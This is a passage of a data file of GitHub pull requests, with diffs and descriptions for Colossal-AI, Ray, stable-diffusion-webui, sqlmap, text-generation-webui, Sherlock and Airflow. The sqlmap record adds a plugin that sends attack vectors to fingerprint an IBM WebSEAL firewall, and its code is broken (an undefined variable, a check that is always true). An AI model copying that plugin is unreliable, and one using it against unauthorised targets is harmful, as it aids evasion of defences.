请访问我们的 [文档](https://www.colossalai.org/) 和 [例程](https://github.com/hpcaitech/ColossalAI-Examples) 以了解详情。
+### ViT
+<p align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
+</p>
+
+- 14倍批大小和5倍训练速度(张量并行=64)
### 推荐系统模型
- [Cached Embedding](https://github.com/hpcaitech/CachedEmbedding), 使用软件Cache实现Embeddings,用更少GPU显存训练更大的模型。
@@ -199,23 +202,38 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
- [OPT推理服务](https://service.colossalai.org/opt): 无需注册,免费体验1750亿参数OPT在线推理服务
+<p id="BLOOM-Inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/BLOOM%20Inference.PNG" width=800/>
+</p>
+
+- [BLOOM](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): 降低1750亿参数BLOOM模型部署推理成本超10倍
<p align="right">(<a href="#top">返回顶端</a>)</p>
## Colossal-AI 成功案例
### AIGC
-加速AIGC(AI内容生成)模型,如[Stable Diffusion](https://github.com/CompVis/stable-diffusion)
+加速AIGC(AI内容生成)模型,如[Stable Diffusion v1](https://github.com/CompVis/stable-diffusion) 和 [Stable Diffusion v2](https://github.com/Stability-AI/stablediffusion)
+
<p id="diffusion_train" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_train.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20v2.png" width=800/>
</p>
-- [Colossal-AI优化Stable Diffusion](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): 6.5倍训练加速和预训练成本降低, 微调硬件成本下降约7倍(从RTX3090/4090到RTX3050/2070)
+- [训练](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): 减少5.6倍显存消耗,硬件成本最高降低46倍(从A100到RTX3060)
<p id="diffusion_demo" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_demo.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/DreamBooth.png" width=800/>
</p>
+- [DreamBooth微调](https://github.com/hpcaitech/ColossalAI/tree/hotfix/doc/examples/images/dreambooth): 仅需3-5张目标主题图像个性化微调
+
+<p id="inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20Inference.jpg" width=800/>
+</p>
+
+- [推理](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): GPU推理显存消耗降低2.5倍
+
+
<p align="right">(<a href="#top">返回顶端</a>)</p>
### 生物医药
diff --git a/README.md b/README.md
index 36d5c2e820b6..c58ad5e5c4ee 100644
--- a/README.md
+++ b/README.md
@@ -38,12 +38,12 @@
<li>
<a href="#Parallel-Training-Demo">Parallel Training Demo</a>
<ul>
- <li><a href="#ViT">ViT</a></li>
<li><a href="#GPT-3">GPT-3</a></li>
<li><a href="#GPT-2">GPT-2</a></li>
<li><a href="#BERT">BERT</a></li>
<li><a href="#PaLM">PaLM</a></li>
<li><a href="#OPT">OPT</a></li>
+ <li><a href="#ViT">ViT</a></li>
<li><a href="#Recommendation-System-Models">Recommendation System Models</a></li>
</ul>
</li>
@@ -59,6 +59,7 @@
<ul>
<li><a href="#GPT-3-Inference">GPT-3</a></li>
<li><a href="#OPT-Serving">OPT-175B Online Serving for Text Generation</a></li>
+ <li><a href="#BLOOM-Inference">175B BLOOM</a></li>
</ul>
</li>
<li>
@@ -104,6 +105,7 @@ distributed training and inference in a few lines.
- 1D, [2D](https://arxiv.org/abs/2104.05343), [2.5D](https://arxiv.org/abs/2105.14500), [3D](https://arxiv.org/abs/2105.14450) Tensor Parallelism
- [Sequence Parallelism](https://arxiv.org/abs/2105.13120)
- [Zero Redundancy Optimizer (ZeRO)](https://arxiv.org/abs/1910.02054)
+ - [Auto-Parallelism](https://github.com/hpcaitech/ColossalAI/tree/main/examples/language/gpt/auto_parallel_with_gpt)
- Heterogeneous Memory Management
- [PatrickStar](https://arxiv.org/abs/2108.05818)
@@ -119,12 +121,6 @@ distributed training and inference in a few lines.
<p align="right">(<a href="#top">back to top</a>)</p>
## Parallel Training Demo
-### ViT
-<p align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
-</p>
-
-- 14x larger batch size, and 5x faster training for Tensor Parallelism = 64
### GPT-3
<p align="center">
@@ -158,6 +154,13 @@ distributed training and inference in a few lines.
Please visit our [documentation](https://www.colossalai.org/) and [examples](https://github.com/hpcaitech/ColossalAI-Examples) for more details.
+### ViT
+<p align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
+</p>
+
+- 14x larger batch size, and 5x faster training for Tensor Parallelism = 64
+
### Recommendation System Models
- [Cached Embedding](https://github.com/hpcaitech/CachedEmbedding), utilize software cache to train larger embedding tables with a smaller GPU memory budget.
@@ -202,22 +205,37 @@ Please visit our [documentation](https://www.colossalai.org/) and [examples](htt
- [OPT Serving](https://service.colossalai.org/opt): Try 175-billion-parameter OPT online services for free, without any registration whatsoever.
+<p id="BLOOM-Inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/BLOOM%20Inference.PNG" width=800/>
+</p>
+
+- [BLOOM](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): Reduce hardware deployment costs of 175-billion-parameter BLOOM by more than 10 times.
+
<p align="right">(<a href="#top">back to top</a>)</p>
## Colossal-AI in the Real World
### AIGC
-Acceleration of AIGC (AI-Generated Content) models such as [Stable Diffusion](https://github.com/CompVis/stable-diffusion)
+Acceleration of AIGC (AI-Generated Content) models such as [Stable Diffusion v1](https://github.com/CompVis/stable-diffusion) and [Stable Diffusion v2](https://github.com/Stability-AI/stablediffusion).
<p id="diffusion_train" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_train.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20v2.png" width=800/>
</p>
-- [Stable Diffusion with Colossal-AI](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): 6.5x faster training and pretraining cost saving, the hardware cost of fine-tuning can be almost 7X cheaper (from RTX3090/4090 to RTX3050/2070)
+- [Training](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): Reduce Stable Diffusion memory consumption by up to 5.6x and hardware cost by up to 46x (from A100 to RTX3060).
<p id="diffusion_demo" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_demo.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/DreamBooth.png" width=800/>
</p>
+- [DreamBooth Fine-tuning](https://github.com/hpcaitech/ColossalAI/tree/hotfix/doc/examples/images/dreambooth): Personalize your model using just 3-5 images of the desired subject.
+
+<p id="inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20Inference.jpg" width=800/>
+</p>
+
+- [Inference](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): Reduce inference GPU memory consumption by 2.5x.
+
+
<p align="right">(<a href="#top">back to top</a>)</p>
### Biomedicine
|
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/2282
|
2023-01-03T09:20:36Z
|
2023-01-03T09:35:07Z
|
2023-01-03T09:35:07Z
|
2023-01-03T09:39:55Z
| 3,233
|
hpcaitech/ColossalAI
| 11,158
|
|
[grpc] refactor rpc server to support multiple io services
|
diff --git a/src/ray/raylet/node_manager.cc b/src/ray/raylet/node_manager.cc
index a0bde1ff0655f..08f5b36208708 100644
--- a/src/ray/raylet/node_manager.cc
+++ b/src/ray/raylet/node_manager.cc
@@ -100,7 +100,8 @@ NodeManager::NodeManager(boost::asio::io_service &io_service,
gcs_client_->raylet_task_table(), gcs_client_->raylet_task_table(),
config.max_lineage_size),
actor_registry_(),
- node_manager_server_(config.node_manager_port, io_service, *this),
+ node_manager_server_("NodeManager", config.node_manager_port),
+ node_manager_service_(io_service, *this),
client_call_manager_(io_service) {
RAY_CHECK(heartbeat_period_.count() > 0);
// Initialize the resource map with own cluster resource configuration.
@@ -118,6 +119,7 @@ NodeManager::NodeManager(boost::asio::io_service &io_service,
RAY_ARROW_CHECK_OK(store_client_.Connect(config.store_socket_name.c_str()));
// Run the node manger rpc server.
+ node_manager_server_.RegisterService(node_manager_service_);
node_manager_server_.Run();
}
diff --git a/src/ray/raylet/node_manager.h b/src/ray/raylet/node_manager.h
index 61613358330c8..804553d9cfd9c 100644
--- a/src/ray/raylet/node_manager.h
+++ b/src/ray/raylet/node_manager.h
@@ -506,7 +506,10 @@ class NodeManager : public rpc::NodeManagerServiceHandler {
std::unordered_map<ActorID, ActorCheckpointID> checkpoint_id_to_restore_;
/// The RPC server.
- rpc::NodeManagerServer node_manager_server_;
+ rpc::GrpcServer node_manager_server_;
+
+ /// The RPC service.
+ rpc::NodeManagerGrpcService node_manager_service_;
/// The `ClientCallManager` object that is shared by all `NodeManagerClient`s.
rpc::ClientCallManager client_call_manager_;
diff --git a/src/ray/rpc/grpc_server.cc b/src/ray/rpc/grpc_server.cc
index feb788da76923..f507039990c28 100644
--- a/src/ray/rpc/grpc_server.cc
+++ b/src/ray/rpc/grpc_server.cc
@@ -1,4 +1,5 @@
#include "ray/rpc/grpc_server.h"
+#include <grpcpp/impl/service_type.h>
namespace ray {
namespace rpc {
@@ -9,8 +10,10 @@ void GrpcServer::Run() {
grpc::ServerBuilder builder;
// TODO(hchen): Add options for authentication.
builder.AddListeningPort(server_address, grpc::InsecureServerCredentials(), &port_);
- // Allow subclasses to register concrete services.
- RegisterServices(builder);
+ // Register all the services to this server.
+ for (auto &entry : services_) {
+ builder.RegisterService(&entry.get());
+ }
// Get hold of the completion queue used for the asynchronous communication
// with the gRPC runtime.
cq_ = builder.AddCompletionQueue();
@@ -18,8 +21,7 @@ void GrpcServer::Run() {
server_ = builder.BuildAndStart();
RAY_LOG(DEBUG) << name_ << " server started, listening on port " << port_ << ".";
- // Allow subclasses to initialize the server call factories.
- InitServerCallFactories(&server_call_factories_and_concurrencies_);
+ // Create calls for all the server call factories.
for (auto &entry : server_call_factories_and_concurrencies_) {
for (int i = 0; i < entry.second; i++) {
// Create and request calls from the factory.
@@ -31,6 +33,11 @@ void GrpcServer::Run() {
polling_thread.detach();
}
+void GrpcServer::RegisterService(GrpcService &service) {
+ services_.emplace_back(service.GetGrpcService());
+ service.InitServerCallFactories(cq_, &server_call_factories_and_concurrencies_);
+}
+
void GrpcServer::PollEventsFromCompletionQueue() {
void *tag;
bool ok;
@@ -48,7 +55,7 @@ void GrpcServer::PollEventsFromCompletionQueue() {
// incoming request.
server_call->GetFactory().CreateCall();
server_call->SetState(ServerCallState::PROCESSING);
- main_service_.post([server_call] { server_call->HandleRequest(); });
+ server_call->HandleRequest();
break;
case ServerCallState::SENDING_REPLY:
// The reply has been sent, this call can be deleted now.
diff --git a/src/ray/rpc/grpc_server.h b/src/ray/rpc/grpc_server.h
index 4953f470610fc..584da6565a47a 100644
--- a/src/ray/rpc/grpc_server.h
+++ b/src/ray/rpc/grpc_server.h
@@ -12,7 +12,9 @@
namespace ray {
namespace rpc {
-/// Base class that represents an abstract gRPC server.
+class GrpcService;
+
+/// Class that represents an gRPC server.
///
/// A `GrpcServer` listens on a specific port. It owns
/// 1) a `ServerCompletionQueue` that is used for polling events from gRPC,
@@ -28,11 +30,7 @@ class GrpcServer {
/// \param[in] name Name of this server, used for logging and debugging purpose.
/// \param[in] port The port to bind this server to. If it's 0, a random available port
/// will be chosen.
- /// \param[in] main_service The main event loop, to which service handler functions
- /// will be posted.
- GrpcServer(const std::string &name, const uint32_t port,
- boost::asio::io_service &main_service)
- : name_(name), port_(port), main_service_(main_service) {}
+ GrpcServer(const std::string &name, const uint32_t port) : name_(name), port_(port) {}
/// Destruct this gRPC server.
~GrpcServer() {
@@ -46,36 +44,25 @@ class GrpcServer {
/// Get the port of this gRPC server.
int GetPort() const { return port_; }
- protected:
- /// Subclasses should implement this method and register one or multiple gRPC services
- /// to the given `ServerBuilder`.
+ /// Register a grpc service. Multiple services can be registered to the same server.
+ /// Note that the `service` registered must remain valid for the lifetime of the
+ /// `GrpcServer`, as it holds the underlying `grpc::Service`.
///
- /// \param[in] builder The `ServerBuilder` instance to register services to.
- virtual void RegisterServices(grpc::ServerBuilder &builder) = 0;
-
- /// Subclasses should implement this method to initialize the `ServerCallFactory`
- /// instances, as well as specify maximum number of concurrent requests that gRPC
- /// server can "accept" (not "handle"). Each factory will be used to create
- /// `accept_concurrency` `ServerCall` objects, each of which will be used to accept and
- /// handle an incoming request.
- ///
- /// \param[out] server_call_factories_and_concurrencies The `ServerCallFactory` objects,
- /// and the maximum number of concurrent requests that gRPC server can accept.
- virtual void InitServerCallFactories(
- std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
- *server_call_factories_and_concurrencies) = 0;
+ /// \param[in] service A `GrpcService` to register to this server.
+ void RegisterService(GrpcService &service);
+ protected:
/// This function runs in a background thread. It keeps polling events from the
/// `ServerCompletionQueue`, and dispaches the event to the `ServiceHandler` instances
/// via the `ServerCall` objects.
void PollEventsFromCompletionQueue();
- /// The main event loop, to which the service handler functions will be posted.
- boost::asio::io_service &main_service_;
/// Name of this server, used for logging and debugging purpose.
const std::string name_;
/// Port of this server.
int port_;
+ /// The `grpc::Service` objects which should be registered to `ServerBuilder`.
+ std::vector<std::reference_wrapper<grpc::Service>> services_;
/// The `ServerCallFactory` objects, and the maximum number of concurrent requests that
/// gRPC server can accept.
std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
@@ -86,6 +73,46 @@ class GrpcServer {
std::unique_ptr<grpc::Server> server_;
};
+/// Base class that represents an abstract gRPC service.
+///
+/// Subclass should implement `InitServerCallFactories` to decide
+/// which kinds of requests this service should accept.
+class GrpcService {
+ public:
+ /// Constructor.
+ ///
+ /// \param[in] main_service The main event loop, to which service handler functions
+ /// will be posted.
+ GrpcService(boost::asio::io_service &main_service) : main_service_(main_service) {}
+
+ /// Destruct this gRPC service.
+ ~GrpcService() {}
+
+ protected:
+ /// Return the underlying grpc::Service object for this class.
+ /// This is passed to `GrpcServer` to be registered to grpc `ServerBuilder`.
+ virtual grpc::Service &GetGrpcService() = 0;
+
+ /// Subclasses should implement this method to initialize the `ServerCallFactory`
+ /// instances, as well as specify maximum number of concurrent requests that gRPC
+ /// server can "accept" (not "handle"). Each factory will be used to create
+ /// `accept_concurrency` `ServerCall` objects, each of which will be used to accept and
+ /// handle an incoming request.
+ ///
+ /// \param[in] cq The grpc completion queue.
+ /// \param[out] server_call_factories_and_concurrencies The `ServerCallFactory` objects,
+ /// and the maximum number of concurrent requests that gRPC server can accept.
+ virtual void InitServerCallFactories(
+ const std::unique_ptr<grpc::ServerCompletionQueue> &cq,
+ std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
+ *server_call_factories_and_concurrencies) = 0;
+
+ /// The main event loop, to which the service handler functions will be posted.
+ boost::asio::io_service &main_service_;
+
+ friend class GrpcServer;
+};
+
} // namespace rpc
} // namespace ray
diff --git a/src/ray/rpc/node_manager_server.h b/src/ray/rpc/node_manager_server.h
index afaea299ea891..d05f268c65b24 100644
--- a/src/ray/rpc/node_manager_server.h
+++ b/src/ray/rpc/node_manager_server.h
@@ -25,25 +25,22 @@ class NodeManagerServiceHandler {
RequestDoneCallback done_callback) = 0;
};
-/// The `GrpcServer` for `NodeManagerService`.
-class NodeManagerServer : public GrpcServer {
+/// The `GrpcService` for `NodeManagerService`.
+class NodeManagerGrpcService : public GrpcService {
public:
/// Constructor.
///
- /// \param[in] port See super class.
- /// \param[in] main_service See super class.
+ /// \param[in] io_service See super class.
/// \param[in] handler The service handler that actually handle the requests.
- NodeManagerServer(const uint32_t port, boost::asio::io_service &main_service,
- NodeManagerServiceHandler &service_handler)
- : GrpcServer("NodeManager", port, main_service),
- service_handler_(service_handler){};
+ NodeManagerGrpcService(boost::asio::io_service &io_service,
+ NodeManagerServiceHandler &service_handler)
+ : GrpcService(io_service), service_handler_(service_handler){};
- void RegisterServices(grpc::ServerBuilder &builder) override {
- /// Register `NodeManagerService`.
- builder.RegisterService(&service_);
- }
+ protected:
+ grpc::Service &GetGrpcService() override { return service_; }
void InitServerCallFactories(
+ const std::unique_ptr<grpc::ServerCompletionQueue> &cq,
std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
*server_call_factories_and_concurrencies) override {
// Initialize the factory for `ForwardTask` requests.
@@ -51,7 +48,8 @@ class NodeManagerServer : public GrpcServer {
new ServerCallFactoryImpl<NodeManagerService, NodeManagerServiceHandler,
ForwardTaskRequest, ForwardTaskReply>(
service_, &NodeManagerService::AsyncService::RequestForwardTask,
- service_handler_, &NodeManagerServiceHandler::HandleForwardTask, cq_));
+ service_handler_, &NodeManagerServiceHandler::HandleForwardTask, cq,
+ main_service_));
// Set `ForwardTask`'s accept concurrency to 100.
server_call_factories_and_concurrencies->emplace_back(
@@ -61,6 +59,7 @@ class NodeManagerServer : public GrpcServer {
private:
/// The grpc async service object.
NodeManagerService::AsyncService service_;
+
/// The service handler that actually handle the requests.
NodeManagerServiceHandler &service_handler_;
};
diff --git a/src/ray/rpc/server_call.h b/src/ray/rpc/server_call.h
index e06278260ab67..08ca128323ee3 100644
--- a/src/ray/rpc/server_call.h
+++ b/src/ray/rpc/server_call.h
@@ -94,20 +94,27 @@ class ServerCallImpl : public ServerCall {
/// \param[in] factory The factory which created this call.
/// \param[in] service_handler The service handler that handles the request.
/// \param[in] handle_request_function Pointer to the service handler function.
+ /// \param[in] io_service The event loop.
ServerCallImpl(
const ServerCallFactory &factory, ServiceHandler &service_handler,
- HandleRequestFunction<ServiceHandler, Request, Reply> handle_request_function)
+ HandleRequestFunction<ServiceHandler, Request, Reply> handle_request_function,
+ boost::asio::io_service &io_service)
: state_(ServerCallState::PENDING),
factory_(factory),
service_handler_(service_handler),
handle_request_function_(handle_request_function),
- response_writer_(&context_) {}
+ response_writer_(&context_),
+ io_service_(io_service) {}
ServerCallState GetState() const override { return state_; }
void SetState(const ServerCallState &new_state) override { state_ = new_state; }
void HandleRequest() override {
+ io_service_.post([this] { HandleRequestImpl(); });
+ }
+
+ void HandleRequestImpl() {
state_ = ServerCallState::PROCESSING;
(service_handler_.*handle_request_function_)(request_, &reply_,
[this](Status status) {
@@ -146,6 +153,9 @@ class ServerCallImpl : public ServerCall {
/// The reponse writer.
grpc::ServerAsyncResponseWriter<Reply> response_writer_;
+ /// The event loop.
+ boost::asio::io_service &io_service_;
+
/// The request message.
Request request_;
@@ -185,23 +195,26 @@ class ServerCallFactoryImpl : public ServerCallFactory {
/// \param[in] service_handler The service handler that handles the request.
/// \param[in] handle_request_function Pointer to the service handler function.
/// \param[in] cq The `CompletionQueue`.
+ /// \param[in] io_service The event loop.
ServerCallFactoryImpl(
AsyncService &service,
RequestCallFunction<GrpcService, Request, Reply> request_call_function,
ServiceHandler &service_handler,
HandleRequestFunction<ServiceHandler, Request, Reply> handle_request_function,
- const std::unique_ptr<grpc::ServerCompletionQueue> &cq)
+ const std::unique_ptr<grpc::ServerCompletionQueue> &cq,
+ boost::asio::io_service &io_service)
: service_(service),
request_call_function_(request_call_function),
service_handler_(service_handler),
handle_request_function_(handle_request_function),
- cq_(cq) {}
+ cq_(cq),
+ io_service_(io_service) {}
ServerCall *CreateCall() const override {
// Create a new `ServerCall`. This object will eventually be deleted by
// `GrpcServer::PollEventsFromCompletionQueue`.
auto call = new ServerCallImpl<ServiceHandler, Request, Reply>(
- *this, service_handler_, handle_request_function_);
+ *this, service_handler_, handle_request_function_, io_service_);
/// Request gRPC runtime to starting accepting this kind of request, using the call as
/// the tag.
(service_.*request_call_function_)(&call->context_, &call->request_,
@@ -225,6 +238,9 @@ class ServerCallFactoryImpl : public ServerCallFactory {
/// The `CompletionQueue`.
const std::unique_ptr<grpc::ServerCompletionQueue> &cq_;
+
+ /// The event loop.
+ boost::asio::io_service &io_service_;
};
} // namespace rpc
|
## What do these changes do?
Support multiple services for a single grpc server
- add a `GrpcService` abstraction in addition to `GrpcServer`
- allow different rpc services for a single rpc server, they can use different `IO services` while sharing a single port, which is needed to support direct actor call.
## Related issue number
#5029
## Linter
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
|
https://api.github.com/repos/ray-project/ray/pulls/5023
|
2019-06-24T08:10:38Z
|
2019-06-26T02:08:10Z
|
2019-06-26T02:08:10Z
|
2019-06-26T04:19:33Z
| 3,913
|
ray-project/ray
| 19,704
|
Change denoising_strength default to None.
|
diff --git a/modules/processing.py b/modules/processing.py
index e124e7f0dd2..061d9955a24 100644
--- a/modules/processing.py
+++ b/modules/processing.py
@@ -142,7 +142,7 @@ class StableDiffusionProcessing:
overlay_images: list = None
eta: float = None
do_not_reload_embeddings: bool = False
- denoising_strength: float = 0
+ denoising_strength: float = None
ddim_discretize: str = None
s_min_uncond: float = None
s_churn: float = None
|
Fixes a bug where `Denoising strength: 0` is added to the metadata of API images unless explicitly set to `None` in the API payload, causing hires fix to be always enabled when reading the metadata from an image, even if the image didn't use hires fix to begin with.
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/13466
|
2023-10-02T04:48:53Z
|
2023-10-02T10:05:27Z
|
2023-10-02T10:05:27Z
|
2023-10-02T10:05:30Z
| 143
|
AUTOMATIC1111/stable-diffusion-webui
| 39,676
|
IBM Webseal
|
diff --git a/waf/ibm_webseal.py b/waf/ibm_webseal.py
new file mode 100644
index 00000000000..220c13c3976
--- /dev/null
+++ b/waf/ibm_webseal.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "IBM Security Access Manager for Web WebSEAL."
+
+def detect(get_page):
+ retval = False
+
+ for vector in WAF_ATTACK_VECTORS:
+ _, headers, _ = get_page(get=vector)
+ retval = re.search(r"WebSEAL/9.0.5.0", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+ retval |= "The Access Manager WebSEAL server received an invalid HTTP request." in (page or "") is not None
+ if retval:
+ break
+
+ return retval
|
**HTTP Request**
```
GET /?search=queryhere HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```
**HTTP Response**
```
HTTP/1.1 400 Bad Request
content-length: 1382
content-type: text/html
date: Sat, 09 Feb 2019 11:17:46 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/9.0.5.0
cache-control: no-store
strict-transport-security:
pragma: no-cache
```

|
https://api.github.com/repos/sqlmapproject/sqlmap/pulls/3479
|
2019-02-09T11:27:19Z
|
2019-02-09T13:44:05Z
|
2019-02-09T13:44:05Z
|
2019-02-09T14:03:49Z
| 276
|
sqlmapproject/sqlmap
| 15,074
|
Remove message.content from openai streaming API
|
diff --git a/extensions/openai/completions.py b/extensions/openai/completions.py
index c6deefb3d2..897d542ce5 100644
--- a/extensions/openai/completions.py
+++ b/extensions/openai/completions.py
@@ -297,8 +297,6 @@ def chat_streaming_chunk(content):
resp_list: [{
"index": 0,
"finish_reason": None,
- # So yeah... do both methods? delta and messages.
- "message": {'role': 'assistant', 'content': content},
"delta": {'role': 'assistant', 'content': content},
}],
}
|
The [OpenAI spec](https://platform.openai.com/docs/api-reference/streaming) does not expect a `message` object when streaming is enabled. Returning both sometimes [causes issues in downstream consumers](https://github.com/danny-avila/LibreChat/discussions/1795).
## Checklist:
- [x] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines).
|
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5503
|
2024-02-14T14:54:39Z
|
2024-02-19T21:50:28Z
|
2024-02-19T21:50:28Z
|
2024-02-19T21:50:28Z
| 145
|
oobabooga/text-generation-webui
| 26,431
|
added link re: raidforums
|
diff --git a/removed_sites.md b/removed_sites.md
index 4a8cb12d8..01accb108 100644
--- a/removed_sites.md
+++ b/removed_sites.md
@@ -1390,7 +1390,7 @@ As og 2022-05-01, Steam returns false positives
## Raidforums
-Raidforums is now run by the FBI
+Raidforums is [now run by the FBI](https://twitter.com/janomine/status/1499453777648234501?s=21)
```json
"Raidforums": {
"errorType": "status_code",
@@ -1580,4 +1580,4 @@ As of 09.10.2022, Google Developer returns false positives. The site is dynamic
"username_claimed": "blue",
"username_unclaimed": "noonewouldeverusethis7"
},
-```
\ No newline at end of file
+```
|
added link re: raidforums
|
https://api.github.com/repos/sherlock-project/sherlock/pulls/1548
|
2022-10-13T05:00:08Z
|
2022-10-13T20:02:09Z
|
2022-10-13T20:02:09Z
|
2022-10-13T20:02:19Z
| 215
|
sherlock-project/sherlock
| 36,508
|
[AIRFLOW-3977] Fix/Add examples of how trigger rules interacted with skipped tasks
|
diff --git a/docs/concepts.rst b/docs/concepts.rst
index 9ca1978217739..de2ce228d002b 100644
--- a/docs/concepts.rst
+++ b/docs/concepts.rst
@@ -752,6 +752,67 @@ Note that these can be used in conjunction with ``depends_on_past`` (boolean)
that, when set to ``True``, keeps a task from getting triggered if the
previous schedule for the task hasn't succeeded.
+One must be aware of the interaction between trigger rules and skipped tasks
+in schedule level. Skipped tasks will cascade through trigger rules
+``all_success`` and ``all_failed`` but not ``all_done``, ``one_failed``, ``one_success``,
+``none_failed`` and ``dummy``.
+
+For example, consider the following DAG:
+
+.. code:: python
+
+ #dags/branch_without_trigger.py
+ import datetime as dt
+
+ from airflow.models import DAG
+ from airflow.operators.dummy_operator import DummyOperator
+ from airflow.operators.python_operator import BranchPythonOperator
+
+ dag = DAG(
+ dag_id='branch_without_trigger',
+ schedule_interval='@once',
+ start_date=dt.datetime(2019, 2, 28)
+ )
+
+ run_this_first = DummyOperator(task_id='run_this_first', dag=dag)
+ branching = BranchPythonOperator(
+ task_id='branching', dag=dag,
+ python_callable=lambda: 'branch_a'
+ )
+
+ branch_a = DummyOperator(task_id='branch_a', dag=dag)
+ follow_branch_a = DummyOperator(task_id='follow_branch_a', dag=dag)
+
+ branch_false = DummyOperator(task_id='branch_false', dag=dag)
+
+ join = DummyOperator(task_id='join', dag=dag)
+
+ run_this_first >> branching
+ branching >> branch_a >> follow_branch_a >> join
+ branching >> branch_false >> join
+
+In the case of this DAG, ``join`` is downstream of ``follow_branch_a``
+and ``branch_false``. The ``join`` task will show up as skipped
+because its ``trigger_rule`` is set to ``all_success`` by default and
+skipped tasks will cascade through ``all_success``.
+
+.. image:: img/branch_without_trigger.png
+
+By setting ``trigger_rule`` to ``none_failed`` in ``join`` task,
+
+.. code:: python
+
+ #dags/branch_with_trigger.py
+ ...
+ join = DummyOperator(task_id='join', dag=dag, trigger_rule='none_failed')
+ ...
+
+The ``join`` task will be triggered as soon as
+``branch_false`` has been skipped (a valid completion state) and
+``follow_branch_a`` has succeeded. Because skipped tasks **will not**
+cascade through ``none_failed``.
+
+.. image:: img/branch_with_trigger.png
Latest Run Only
===============
@@ -764,21 +825,9 @@ a pause just wastes CPU cycles.
For situations like this, you can use the ``LatestOnlyOperator`` to skip
tasks that are not being run during the most recent scheduled run for a
-DAG. The ``LatestOnlyOperator`` skips all immediate downstream tasks, and
-itself, if the time right now is not between its ``execution_time`` and the
-next scheduled ``execution_time``.
-
-One must be aware of the interaction between skipped tasks and trigger
-rules. Skipped tasks will cascade through trigger rules ``all_success``
-and ``all_failed`` but not ``all_done``, ``one_failed``, ``one_success``,
-and ``dummy``. If you would like to use the ``LatestOnlyOperator`` with
-trigger rules that do not cascade skips, you will need to ensure that the
-``LatestOnlyOperator`` is **directly** upstream of the task you would like
-to skip.
-
-It is possible, through use of trigger rules to mix tasks that should run
-in the typical date/time dependent mode and those using the
-``LatestOnlyOperator``.
+DAG. The ``LatestOnlyOperator`` skips all downstream tasks, if the time
+right now is not between its ``execution_time`` and the next scheduled
+``execution_time``.
For example, consider the following DAG:
@@ -795,8 +844,8 @@ For example, consider the following DAG:
dag = DAG(
dag_id='latest_only_with_trigger',
- schedule_interval=dt.timedelta(hours=4),
- start_date=dt.datetime(2016, 9, 20),
+ schedule_interval=dt.timedelta(hours=1),
+ start_date=dt.datetime(2019, 2, 28),
)
latest_only = LatestOnlyOperator(task_id='latest_only', dag=dag)
@@ -820,9 +869,8 @@ for all runs except the latest run. ``task1`` is directly downstream of
scheduled periods. ``task3`` is downstream of ``task1`` and ``task2`` and
because of the default ``trigger_rule`` being ``all_success`` will receive
a cascaded skip from ``task1``. ``task4`` is downstream of ``task1`` and
-``task2`` but since its ``trigger_rule`` is set to ``all_done`` it will
-trigger as soon as ``task1`` has been skipped (a valid completion state)
-and ``task2`` has succeeded.
